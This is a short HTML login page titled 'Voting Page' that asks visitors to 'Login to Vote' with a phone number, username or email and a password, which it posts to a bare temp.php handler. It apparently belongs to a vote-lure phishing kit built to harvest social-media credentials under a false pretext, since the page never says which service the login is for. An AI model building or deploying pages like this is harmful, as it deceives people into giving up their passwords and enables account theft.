<!DOCTYPE html><html lang="en"><head>
<!-- TYPE BELOW IS PROBABLY: 'website' or 'article' or look on https://ogp.me/#types -->
<meta property="og:type" content="Voting Page">
	<meta charset="utf-8">
	<meta name="author" content="Kodinger">
	<meta name="viewport" content="width=device-width,initial-scale=1">
	<title>Voting Page</title>
	<link rel="stylesheet" href="css/bootstrap.min.css" crossorigin="anonymous">
	<link rel="stylesheet" type="text/css" href="css/my-login.css">
	
</head>

<body class="my-login-page">

	<section class="h-100">
		<div class="container h-100">
			<div class="row justify-content-md-center h-100">
				<div class="card-wrapper">
					<div class="brand">
						<img src="images/logo.png" alt="logo">
					</div>
					
					<div class="card fat">
						<div class="card-body">
							<h4 class="card-title">Login to Vote</h4>
							
							<form action="temp.php" method="post" class="my-login-validation" novalidate>
							
								<div class="form-group">
									<input id="email" type="username" placeholder="Phone number, username, email address" class="form-control" name="username" value required autofocus>

									<div class="invalid-feedback">
										Email is invalid
									</div>
								</div>

								<div class="form-group">
									
									<input id="password" type="password" placeholder="Password" class="form-control" name="password" required data-eye>
								    <div class="invalid-feedback">
								    	Password is required
							    	</div>
								</div>

								<div class="form-group">
									<div class="custom-checkbox custom-control">
										<input type="checkbox" name="remember" id="remember" class="custom-control-input">
									</div>
									
								</div>

								<div class="form-group m-0">
									<button type="submit" class="btn btn-primary btn-block">
										Log in
									</button>
								</div>
								
							</form>
						</div>
					</div>
					<div class="footer">
					</div>
				</div>
			</div>
		</div>
	</section>

	<script src="js/jquery-3.3.1.slim.min.js" crossorigin="anonymous"></script>
	<script src="js/my-login.js"></script>


</body></html>